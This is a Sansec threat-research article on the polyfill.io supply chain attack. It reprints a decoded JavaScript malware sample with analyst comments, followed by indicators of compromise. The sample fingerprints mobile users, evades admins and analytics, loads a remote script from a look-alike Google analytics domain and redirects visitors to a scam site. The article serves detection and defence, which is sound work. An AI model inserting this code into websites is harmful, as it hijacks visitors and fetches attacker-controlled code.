Polyfill supply chain attack hits 100K+ sites
by Sansec Forensics Team
Published in Threat Research − June 25, 2024
The new Chinese owner of the popular Polyfill JS project injects malware into more than 100 thousand sites.
bootcdn.net
, bootcss.com
, staticfile.net
, staticfile.org
, unionadjs.com
, xhsbpza.com
, union.macoms.la
, newcrbpc.com.
The polyfill.js
is a popular open source library to support older browsers. 100K+ sites embed it using the cdn.polyfill.io
domain. Notable users are JSTOR, Intuit and World Economic Forum. However, in February this year, a Chinese company bought the domain and the Github account. Since then, this domain has been caught injecting malware on mobile devices via any site that embeds cdn.polyfill.io
. Any complaints were quickly removed (archive here) from the Github repository.
The polyfill code is dynamically generated based on the HTTP headers, so multiple attack vectors are likely. Sansec decoded one particular malware sample (see below) which redirects mobile users to a sports betting site using a fake Google analytics domain (www.googie-anaiytics.com
). The code has specific protection against reverse engineering, and only activates on specific mobile devices at specific hours. It also does not activate when it detects an admin user. It also delays execution when a web analytics service is found, presumably to not end up in the stats.
The original polyfill author recommends not using Polyfill at all, as it is no longer needed by modern browsers anyway. Meanwhile, both Fastly and Cloudflare have put up trustworthy alternatives, if you still need it.
This incident is a typical example of a supply chain attack. To get visibility into the code that your users are loading, we recommend our (free) CSP monitoring service Sansec Watch.
Our eComscan backend scanner has also been updated with polyfill.io detection.
Polyfill malicious payload example
We added some names for readability; however, tiaozhuan
came from the original malware (which means "jump" in Chinese).
// Analyst note: desktop-client check. Returns true only when navigator.platform
// exactly equals one of the listed Windows/Mac strings; any other platform, or
// any exception (e.g. navigator missing), yields false. check_tiaozhuan below
// uses the negation of this to restrict the redirect to non-PC clients.
function isPc() {
try {
var _isWin =
navigator.platform == "Win32" || navigator.platform == "Windows",
_isMac =
navigator.platform == "Mac68K" ||
navigator.platform == "MacPPC" ||
navigator.platform == "Macintosh" ||
navigator.platform == "MacIntel";
if (_isMac || _isWin) {
return true;
} else {
return false;
}
} catch (_0x44e1f6) {
// Obfuscated identifier kept as decoded; errors are silently treated as "not PC".
return false;
}
}
// Analyst note: second-stage loader. When a non-empty redirect URL is passed in,
// it loads a script from the look-alike "googie-anaiytics.com" host (listed in the
// IoCs below) via loadJS, which is not part of this excerpt. The callback then
// navigates the page to the URL only if the global `usercache` is true; that
// global is not defined here and is presumably set by the remote script.
// The remote script URL and the `usercache` gate are useful static/CSP indicators.
function vfed_update(_0x5ae1f8) {
// _0x5ae1f8: redirect target selected by check_tiaozhuan.
_0x5ae1f8 !== "" &&
loadJS(
"https://www.googie-anaiytics.com/html/checkcachehw.js",
function () {
// `usercache` is undefined in this listing — assumed to come from the loaded script.
if (usercache == true) {
window.location.href = _0x5ae1f8;
}
}
);
}
// Analyst note: redirect decision logic ("tiaozhuan" = "jump"). Only runs for
// user agents matching the mobile regex below. A redirect target is chosen by:
//   1. hard-coded host matches (dxtv1.com, ys752.com, "shuanshu.com.com" — the
//      doubled ".com" is in the original sample),
//   2. an external referrer (referrer contains "." and not the current host),
//   3. otherwise a time-of-day window combined with a 1–100 random roll.
// The chosen URL is only acted on when isPc() is false and no "admin_id" /
// "adminlevels" substring appears in document.cookie — i.e. the sample avoids
// administrators. The cookie names, the regex and the kuurza.com URL are
// reliable detection signatures for this variant.
function check_tiaozhuan() {
var _isMobile = navigator.userAgent.match(
/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i
);
if (_isMobile) {
var _curHost = window.location.host,
_ref = document.referrer,
_redirectURL = "",
_kuurzaBitGet = "https://kuurza.com/redirect?from=bitget",
// _rnd is an integer in [1, 100]; used as a percentage gate below.
_rnd = Math.floor(Math.random() * 100 + 1),
_date = new Date(),
// Local (client) hour, 0–23.
_hours = _date.getHours();
// Case 1: specific hosts always get the redirect URL.
if (
_curHost.indexOf("www.dxtv1.com") !== -1 ||
_curHost.indexOf("www.ys752.com") !== -1
) {
_redirectURL = "https://kuurza.com/redirect?from=bitget";
} else {
if (_curHost.indexOf("shuanshu.com.com") !== -1) {
_redirectURL = "https://kuurza.com/redirect?from=bitget";
} else {
// Case 2: arrival from an external referrer always redirects.
if (_ref.indexOf(".") !== -1 && _ref.indexOf(_curHost) == -1) {
_redirectURL = "https://kuurza.com/redirect?from=bitget";
} else {
// Case 3: time-of-day windows with a probabilistic gate:
// 00–02h: 10%, 02–04h: 15%, 04–07h: 20%, 07h onward: 10%.
if (_hours >= 0 && _hours < 2) {
if (_rnd <= 10) {
_redirectURL = _kuurzaBitGet;
}
} else {
if (_hours >= 2 && _hours < 4) {
_rnd <= 15 && (_redirectURL = _kuurzaBitGet);
} else {
if (_hours >= 4 && _hours < 7) {
_rnd <= 20 && (_redirectURL = _kuurzaBitGet);
} else {
// Both branches of this ternary are identical, so from 07h on the
// 10% gate applies uniformly; the 07–08h distinction has no effect.
_hours >= 7 && _hours < 8
? _rnd <= 10 && (_redirectURL = _kuurzaBitGet)
: _rnd <= 10 && (_redirectURL = _kuurzaBitGet);
}
}
}
}
}
}
// Final gate: non-PC client and no admin-looking cookie substrings.
_redirectURL != "" &&
!isPc() &&
document.cookie.indexOf("admin_id") == -1 &&
document.cookie.indexOf("adminlevels") == -1 &&
vfed_update(_redirectURL);
}
}
// Analyst note: entry point of the payload. It scans the full rendered page
// markup for embeds of common web-analytics services (Baidu Tongji, CNZZ,
// 51.la, Matomo, Google Analytics, Google Tag Manager, Plausible, StatCounter).
// If any is present, the redirect check is deferred by 2 s; otherwise it runs
// immediately. The article attributes the delay to avoiding the site's own
// analytics. The obfuscated flag names are kept as decoded.
let _outerPage = document.documentElement.outerHTML,
bdtjfg = _outerPage.indexOf("hm.baidu.com") != -1;
let cnzfg = _outerPage.indexOf(".cnzz.com") != -1,
wolafg = _outerPage.indexOf(".51.la") != -1;
let mattoo = _outerPage.indexOf(".matomo.org") != -1,
aanaly = _outerPage.indexOf(".google-analytics.com") != -1;
let ggmana = _outerPage.indexOf(".googletagmanager.com") != -1,
aplausix = _outerPage.indexOf(".plausible.io") != -1,
statcct = _outerPage.indexOf(".statcounter.com") != -1;
// Any analytics embed found → delayed execution; none → immediate.
bdtjfg || cnzfg || wolafg || mattoo || aanaly || ggmana || aplausix || statcct
? setTimeout(check_tiaozhuan, 2000)
: check_tiaozhuan();
Indicators of compromise
https://kuurza.com/redirect?from=bitget
https://www.googie-anaiytics.com/html/checkcachehw.js
https://www.googie-anaiytics.com/ga.js
https://cdn.bootcss.com/highlight.js/9.7.0/highlight.min.js
https://union.macoms.la/jquery.min-4.0.2.js
https://newcrbpc.com/redirect?from=bscbc
bootcdn.net
staticfile.net
staticfile.org
unionadjs.com
xhsbpza.com